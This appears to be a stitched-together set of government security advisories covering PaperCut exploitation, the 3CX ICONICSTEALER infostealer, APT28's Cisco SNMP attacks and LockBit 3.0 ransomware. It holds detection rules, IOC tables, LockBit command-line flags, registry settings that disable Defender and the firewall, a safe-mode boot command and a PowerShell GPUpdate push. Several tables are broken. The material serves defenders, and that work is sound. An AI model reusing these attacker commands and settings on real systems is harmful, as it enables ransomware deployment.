alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecemter .com)"; dns_query; content:"windowservicecemter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecemter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (winserverupdates .com)"; dns_query; content:"winserverupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)winserverupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (netviewremote .com)"; dns_query; content:"netviewremote.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)netviewremote.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (updateservicecenter .com)"; dns_query; content:"updateservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)updateservicecenter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecenter .com)"; dns_query; content:"windowservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecenter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecentar .com)"; dns_query; content:"windowservicecentar.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecentar.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category ATTACK_RESPONSE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
Note that these signatures may also not work if the actor modified activity to evade detection by known rules.
A child process is spawned under pc-app.exe
when the vulnerable PaperCut software is used to execute another process, which is the PaperCut server process. Malicious activity against PaperCut servers in mid-April used the RCE to supply commands to a cmd.exe
or powershell.exe
child process, which were then used to conduct further network exploitation. The following YARA rule may detect malicious activity[2].
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: “\pc-app.exe”
Image|endswith:
- “\cmd.exe”
- “\powershell.exe”
condition: selection
level: high
falsepositives:
- Expected admin activity
More advanced versions of the exploit can drop a backdoor executable, use living-off-the-land binaries, or attempt to evade the above YARA rule by spawning an additional child process in-between pc-app.exe
and a command-line interpreter.
Network defenders may be able to identify suspicious activity by reviewing the PaperCut server options to identify unfamiliar print scripts or User/Group Sync settings.
If the PaperCut Application Server logs have debug mode enabled, lines containing SetupCompleted
at a time not correlating with the server installation or upgrade may be indicative of a compromise. Server logs can be found in [app-path]/server/logs/*.*
where server.log
is normally the most recent log file.
Any of the following server log entries may be indicative of a compromise:
User "admin" updated the config key “print.script.sandboxed”
User "admin" updated the config key “device.script.sandboxed”
Admin user "admin" modified the print script on printer
User/Group Sync settings changed by "admin"
See Table 1 through Table 6 for IOCs obtained from FBI investigations and open-source information as of early May 2023.
Email Addresses |
decrypt.support@privyonline[.]com |
fimaribahundqf@gmx[.]com |
main-office@data-highstream[.]com |
prepalkeinuc0u@gmx[.]com |
tpyrcne@onionmail[.]org |
Tox ID |
E3213A199CDA7618AC22486EFECBD9F8E049AC36094D56AC1BFBE67EB9C3CF2352CAE9EBD35F |
IP Address |
Port |
>Date |
Description |
|
- |
April 2023 |
N/A |
|
- |
April 2023 |
Resolves to Tor node. Network communications with |
|
- |
April 2023 |
Resolves to datacenter Tor node. |
|
|
April 2023 |
Resolves to Tor node. Network communications with |
|
- |
April 2023 |
TrueBot C2. DiceLoader malware. |
|
- |
April 2023 |
TrueBot C2. DiceLoader malware. |
|
|
April 2023 |
Resolves to Tor node. Network communications with |
|
>443 |
April 2023 |
N/A |
|
|
April 2023 |
Outbound communications from |
|
|
April 2023 |
Resolves to Tor node. Network communications with |
|
- |
April 2023 |
N/A |
|
- |
April 2023 |
Cobalt Strike C2. |
|
- |
April 2023 |
Cobalt Strike C2. |
|
- |
April 2023 |
N/A |
|
443 |
April 2023 |
Resolves to Tor node. Network communications with |
|
9100, 443 |
April 2023 |
Outbound communications from |
|
- |
April 2023 |
File |
Malicious Domain |
Description |
anydeskupdate[.]com |
N/A |
anydeskupdates[.]com |
N/A |
ber6vjyb[.]com |
Associated with TrueBot C2 |
netviewremote[.]com |
N/A |
Associated with Cobalt Strike Beacon |
|
upd343.winserverupdates[.]com |
Associated with Cobalt Strike Beacon |
upd488.windowservicecemter[.]com |
Associated with TrueBot payload |
upd488.windowservicecemter[.]com/download/update.dll |
File: Cobalt Strike Beacon |
updateservicecenter[.]com |
N/A |
windowcsupdates[.]com |
N/A |
windowservicecemter[.]com |
Associated with TrueBot payload |
windowservicecentar[.]com |
N/A |
windowservicecenter[.]com |
N/A |
winserverupdates[.]com |
N/A |
winserverupdates[.]com |
N/A |
Command |
Description |
|
Launches |
|
Downloads |
|
Installs legitimate Atera RMM software on the system silently, with the specified email address and company ID properties. |
File |
SHA-256 |
Description |
|
N/A |
Unspecified files created in Tor directory |
|
6bb160ebdc59395882ff322e67e000a22a5c54ac777b6b1f10f1fef381df9c15 |
Reverse SOCKS5 tunneler with TLS support (see https://github.com/kost/revsocks) |
|
N/A |
Unspecified content within servers.txt file; likely a list of proxy servers for |
|
c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125 |
TrueBot malware |
|
N/A |
Unknown file used to send outbound communications through Tor |
|
0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f |
Cobalt Strike Beacon |
If compromise is suspected or detected, organizations should:
FBI and CISA recommend organizations:
ACKNOWLEDGMENTS
The Multi-State Information Sharing and Analysis Center (MS-ISAC) contributed to this advisory.
REFERENCES
[1] PaperCut: URGENT | PaperCut MF/NG vulnerability bulletin (March 2023)
[2] Huntress: Critical Vulnerabilities in PaperCut Print Management Software
This product is provided subject to this Notification and this Privacy & Use policy.
NotificationThis report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise. This document is marked TLP:CLEAR--Disclosure is not limited. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp. SummaryDescriptionThis submission included one unique file. This file has been identified as a variant of the malware known as ICONICSTEALER. This variant of malware was utilized in the supply chain attack on the commercial software 3CXDesktopApp. The primary purpose of this malware is to steal sensitive data from a victim user's web browser, and make it available for exfiltration by a separate malicious component. Download the PDF version of this report:
MAR-10435108-1.v1 ICONICSTEALER
(PDF, 1.38 MB
)
Submitted Files (1)e2ef455e92b3cb5a4c0f3093191d0bfb4fe3ff961e2a403feaa26060a298c70f (infostealer.dll) Findingse2ef455e92b3cb5a4c0f3093191d0bfb4fe3ff961e2a403feaa26060a298c70fTagsbackdoor information-stealer trojan Details
Antivirus
YARA Rules
ssdeep MatchesNo matches found. DescriptionThis file is a 64-bit Windows DLL (Dynamic-link Library). Analysis indicates this application was part of a supply chain attack against the commercial application 3CXDesktopApp. This malicious DLL was included within an installer for the 3CXDesktopApp. The primary purpose of this DLL is to steal information from various web browsers employed by a victim user. This malware is being referred to in open source as ICONICSTEALER. During runtime the application first attempts to read a file named "\3CXDesktopApp\config.json". Additionally, the malware attempts to collect the victim system's hostname, domain name, and OS version (Figure 1). The malicious application next attempts to steal sensitive information from the victim user's web browser. Specifically it will target the Chrome, Edge, Brave, or Firefox browsers (Figure 2). It uses an embedded SQLITE library to query the browser databases for sensitive information (Figure 3). Analysis indicates the data stolen from the web browsers will be websites recently visited including sensitive parameters passed to the sites. These parameters could include sensitive information including login credentials or credit card numbers. No exfiltration capability was discovered within this malicious application, indicating it works with another malicious component to exfiltrate collected data. ScreenshotsFigure 1 - This screenshot illustrates this malware attempting to access the file \3CXDesktopApp\config.json. Figure 2 - This screenshot illustrates web browsers targeted by this malware, known as ICONICSTEALER. Figure 3 - This screenshot illustrates the malware beginning to search through folders of various web browsers looking for the database files. The database files will be queried with an embedded SQLITE library looking for sensitive information. Figure 4 - This screenshot indicates the malware "backs up" the web browser databases before querying them for sensitive information. It may do this to prevent accidental corruption of the databases, or to prevent the browser from crashing if the user is currently browsing the web. RecommendationsCISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops". Contact Information
CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/ Document FAQWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk. Can I submit malware to CISA? Malware samples can be submitted via three methods:
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov. This product is provided subject to this Notification and this Privacy & Use policy. ACKNOWLEDGEMENTSSentinelOne contributed to this report. |
The UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI) are releasing this joint advisory to provide details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of Cisco routers in 2021.
We assess that APT28 is almost certainly the Russian General Staff Main Intelligence Directorate (GRU) 85th special Service Centre (GTsSS) Military Intelligence Unit 26165. APT28 (also known as Fancy Bear, STRONTIUM, Pawn Storm, the Sednit Gang and Sofacy) is a highly skilled threat actor.
Download the UK PDF version of this report:
Download the US PDF version of this report:
The NCSC has previously attributed the following activity to APT28:
For more information on APT28 activity, see the advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.
As of 2021, APT28 has been observed using commercially available code repositories, and post-exploit frameworks such as Empire. This included the use of PowerShell Empire, in addition to Python versions of Empire.
In 2021, APT28 used infrastructure to masquerade Simple Network Management protocol (SNMP) access into Cisco routers worldwide. This included a small number based in Europe, US government institutions and approximately 250 Ukrainian victims.
SNMP is designed to allow network administrators to monitor and configure network devices remotely, but it can also be misused to obtain sensitive network information and, if vulnerable, exploit devices to penetrate a network.
A number of software tools can scan the entire network using SNMP, meaning that poor configuration such as using default or easy-to-guess community strings, can make a network susceptible to attacks.
Weak SNMP community strings, including the default "public," allowed APT28 to gain access to router information. APT28 sent additional SNMP commands to enumerate router interfaces. [T1078.001]
The compromized routers were configured to accept SNMP v2 requests. SNMP v2 doesn’t support encryption and so all data, including community strings, is sent unencrypted.
Exploitation of CVE-2017-6742
APT28 exploited the vulnerability CVE-2017-6742 (Cisco Bug ID: CSCve54313) [T1190]. This vulnerability was first announced by Cisco on 29 June 2017, and patched software was made available.
Cisco's published advisory provided workarounds, such as limiting access to SNMP from trusted hosts only, or by disabling a number of SNMP Management Information bases (MIBs).
For some of the targeted devices, APT28 actors used an SNMP exploit to deploy malware, as detailed in the NCSC’s Jaguar Tooth Malware Analysis Report. This malware obtained further device information, which is exfiltrated over trivial file transfer protocol (TFTP), and enabled unauthenticated access via a backdoor.
The actor obtained this device information by executing a number of Command Line Interface (CLI) commands via the malware. It includes discovery of other devices on the network by querying the Address Resolution Protocol (ARP) table to obtain MAC addresses. [T1590]
Please refer to the accompanying Malware Analysis Report for indicators of compromise which may help to detect this activity.
This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
For detailed TTPs, see the Malware Analysis Report.
Tactic |
ID |
Technique |
Procedure |
Initial Access |
Exploit Public-facing Application. |
APT28 exploited default/well-known community strings in SNMP as outlined in CVE-2017-6742 (Cisco Bug ID: CSCve54313). |
|
Initial Access |
Valid Accounts: Default Accounts. |
Actors accessed victim routers by using default community strings such as “public.” |
|
Reconnaissance |
Gather Victim Network Information |
Access was gained to perform reconnaissance on victim devices. Further detail of how this was achieved in available in the MITRE ATT&CK section of the Jaguar Tooth MAR. |
APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742 (Cisco Bug ID: CSCve54313) as published by Cisco.
TTPs in this advisory may still be used against vulnerable Cisco devices. Organizations are advised to follow the mitigation advice in this advisory to defend against this activity.
UK organizations should report any suspected compromises to the NCSC.
US organisations should contact CISA’s 24/7 Operations Centre at report@cisa.gov or (888) 282-0870.
Mitigation
This product is provided subject to this Notification and this Privacy & Use policy.
Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.
The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK for Enterprise.
LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.
LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable’s encrypted potion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.
LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.
Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].
During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:
LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.
After files are encrypted, LockBit 3.0 drops a ransom note with the new filename
Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.
LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).
File Sharing Site |
---|
https://www.premiumize[.]com |
https://anonfiles[.]com |
https://www.sendspace[.]com |
https://fex[.]net |
https://transfer[.]sh |
https://send.exploit[.]in |
LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts
are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:
Tool | Description | MITRE ATT&CK ID |
---|---|---|
Chocolatey | Command-line package manager for Windows. | T1072 |
FileZilla | Cross-platform File Transfer Protocol (FTP) application. | T1071.002 |
Impacket | Collection of Python classes for working with network protocols. | S0357 |
MEGA Ltd MegaSync | Cloud-based synchronization tool. | T1567.002 |
Microsoft Sysinternals ProcDump | Generates crash dumps. Commonly used to dump the contents of Local Security Authority Subsystem Service, LSASS.exe. | T1003.001 |
Microsoft Sysinternals PsExec | Execute a command-line process on a remote machine. | S0029 |
Mimikatz | Extracts credentials from system. | S0002 |
Ngrok | Legitimate remote-access tool abused to bypass victim network protections. | S0508 |
PuTTY Link (Plink) | Can be used to automate Secure Shell (SSH) actions on Windows. | T1572 |
Rclone | Command-line program to manage cloud storage files | S1040 |
SoftPerfect Network Scanner | Performs network scans. | T1046 |
Splashtop | Remote-desktop software. | T1021.001 |
WinSCP | SSH File Transfer Protocol client for Windows. | T1048 |
The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.
LockBit 3.0 Black Icon
LockBit 3.0 Wallpaper
LockBit Command Line Parameters
LockBit Parameters | Description |
---|---|
-del |
Self-delete. |
-gdel |
Remove LockBit 3.0 group policy changes. |
-gspd |
Spread laterally via group policy. |
-pass (32 character value) |
(Required) Password used to launch LockBit 3.0. |
-path (File or path) |
Only encrypts provided file or folder. |
-psex |
Spread laterally via admin shares. |
-safe |
Reboot host into Safe Mode. |
-wall |
Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note. |
When executed, LockBit 3.0 will create the mutex, Global
and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.
LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via elevated Component Object Model (COM) Interface. C:WindowsSystem32dllhost.exe is spawned with high integrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC.
For example, %SYSTEM32%dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}.
LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.
LockBit 3.0 Icon
Registry Key | Value | Data |
---|---|---|
HKCR. |
(Default) |
|
HKCR |
(Default) |
C:ProgramData |
LockBit 3.0 Wallpaper
Registry Key | Value | Data |
---|---|---|
HKCUControl PanelDesktopWallPaper |
(Default) |
C:ProgramData |
Disable Privacy Settings Experience
Registry Key | Value | Data |
---|---|---|
SOFTWAREPoliciesMicrosoftWin dowsOOBE |
DisablePrivacyE xperience |
0 |
Enable Automatic Logon
Registry Key | Value | Data |
---|---|---|
SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon |
AutoAdminLogon |
1 |
|
DefaultUserName |
|
|
DefaultDomainNa me |
|
|
DefaultPassword |
|
Disable and Clear Windows Event Logs
Registry Key | Value | Data |
---|---|---|
HKLMSOFTWAREMicrosoftWindows CurrentVersionWINEVTChannels * |
Enabled |
0 |
HKLMSOFTWAREMicrosoftWindows CurrentVersionWINEVTChannels * ChannelAccess |
ChannelAccess |
AO:BAG:SYD:(A;;0x1;; ;SY)(A;;0x5;;;BA)(A; ;0x1;;;LA) |
LockBit 3.0 File Path Locations |
---|
ADMIN$Temp |
%SystemRoot%Temp |
|
LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:
Operating System | Safe Mode with Networking command |
---|---|
Vista and newer |
bcdedit /set {current} safeboot network |
Pre-Vista |
bootcfg /raw /a /safeboot:network /id 1 |
Operating System | Disable Safe mode reboot |
---|---|
Vista and newer |
bcdedit /deletevalue {current} safeboot |
Pre-Vista |
bootcfg /raw /fastdetect /id 1 |
The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:
NetworkShares.xml |
---|
Services.xml stops and disables services on the Active Directory (AD) hosts.
Services.xml |
---|
The following registry configuration changes values for the Group Policy refresh time, disable SmartScreen, and disable Windows Defender.
Registry Key | Registry Value | Value type | Data |
---|---|---|---|
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
GroupPolicyRefresh TimeDC |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
GroupPolicyRefresh TimeOffsetDC |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
GroupPolicyRefresh Time |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
GroupPolicyRefresh TimeOffset |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
EnableSmartScreen |
REG_D WORD |
0 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
**del.ShellSmartSc reenLevel |
REG_S Z |
|
HKLMSOFTWAREPoliciesMicrosoftWindow s Defender |
DisableAntiSpyware |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow s Defender |
DisableRoutinelyTa kingAction |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow s DefenderReal-Time Protection |
DisableRealtimeMon itoring |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow s DefenderReal-Time Protection |
DisableBehaviorMon itoring |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow s DefenderSpynet |
SubmitSamplesConse nt |
REG_D WORD |
2 |
HKLMSOFTWAREPoliciesMicrosoftWindow s DefenderSpynet |
SpynetReporting |
REG_D WORD |
0 |
HKLMSOFTWAREPoliciesMicrosoftWindow sFirewallDomainProfile |
EnableFirewall |
REG_D WORD |
0 |
HKLMSOFTWAREPoliciesMicrosoftWindow sFirewallStandardProfile |
EnableFirewall |
REG_D WORD |
0 |
Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.
Force GPUpdate Powershell Command |
---|
powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke- GPUpdate -computer $_.name -force -RandomDelayInMinutes 0} |
vss | sql | svc$ |
memtas | mepocs | msexchange |
sophos | veeam | backup |
GxVss | GxBlr | GxFWD |
GxCVD | GxCIMgr |
sql | oracle | ocssd |
dbsnmp | synctime | agntsvc |
isqlplussvc | xfssvccon | mydesktopservice |
ocautoupds | encsvc | firefox |
tbirdconfig | mydesktopqos | ocomm |
dbeng50 | sqbcoreservice | excel |
infopath | msaccess | mspu |
onenote | outlook | powerpnt |
steam | thebat | thunderbird |
visio | winword | wordpad |
notepad |
~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.
If configured, Lockbit 3.0 will send two HTTP POST requests to one of the C2servers. Information about the victim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.
Example of HTTP POST request POST |
Mozilla/5.0 (Windows NT 6.1) |
AppleWebKit/587.38 (KHTML, like Gecko) |
Chrome/91.0.4472.77 |
Safari/537.36 | Edge/91.0.864.37 | Firefox/89.0 |
Gecko/20100101 |
See Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Initial Access | ||
---|---|---|
Technique Title | ID | Use |
Valid Accounts | T1078 | LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means of gaining initial access. |
Exploit External Remote Services | T1133 | LockBit 3.0 actors exploit RDP to gain access to victim networks. |
Drive-by Compromise | T1189 | LockBit 3.0 actors gain access to a system through a user visiting a website over the normal course of browsing. |
Exploit Public-Facing Application | T1190 | LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain access to victims’ systems. |
Phishing | T1566 | LockBit 3.0 actors use phishing and spearphishing to gain access to victims' networks. |
Execution | ||
Technique Title | ID | Use |
Execution | TA0002 | LockBit 3.0 launches commands during its execution. |
Software Deployment Tools | T1072 | LockBit 3.0 uses Chocolatey, a command- line package manager for Windows. |
Persistence | ||
Technique Title | ID | Use |
Valid Accounts | T1078 | LockBit 3.0 uses a compromised user account to maintain persistence on the target network. |
Boot or Logo Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for persistence. |
Privilege Escalation | ||
Technique Title | ID | Use |
Privilege Escalation | TA0004 | Lockbit 3.0 will attempt to escalate to the required privileges if current account privileges are insufficient. |
Boot or Logo Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for privilege escalation. |
Defense Evasion | ||
Technique Title | ID | Use |
Obfuscated Files or Information | T1027 | LockBit 3.0 will send encrypted host and bot information to its C2 servers. |
Indicator Removal: File Deletion | T1070.004 | LockBit 3.0 will delete itself from the disk. |
Execution Guardrails: Environmental Keying | T1480.001 | LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered. |
Credential Access | ||
Technique Title | ID | Use |
OS Credential Dumping: LSASS Memory | T1003.001 | LockBit 3.0 uses Microsoft Sysinternals ProDump to dump the contents of LSASS.exe. |
Discovery | ||
Technique Title | ID | Use |
Network Service Discovery | T1046 | LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks. |
System Information Discovery | T1082 | LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. |
System Location Discovery: System Language Discovery | T1614.001 | LockBit 3.0 will not infect machines with language settings that match a defined exclusion list. |
Lateral Movement | ||
Technique Title | ID | Use |
Remote Services: Remote Desktop Protocol | T1021.001 | LockBit 3.0 uses Splashtop remote- desktop software to facilitate lateral movement. |
Command and Control | ||
Technique Title | ID | Use |
Application Layer Protocol: File Transfer Protocols | T1071.002 | LockBit 3.0 uses FileZilla for C2. |
Protocol Tunnel | T1572 | LockBit 3.0 uses Plink to automate SSH actions on Windows. |
Exfiltration | ||
Technique Title | ID | Use |
Exfiltration | TA0010 | LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network. |
Exfiltration Over Web Service | T1567 | LockBit 3.0 uses publicly available file sharing services to exfiltrate a target’s data. |
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration. |
Impact | ||
Technique Title | ID | Use |
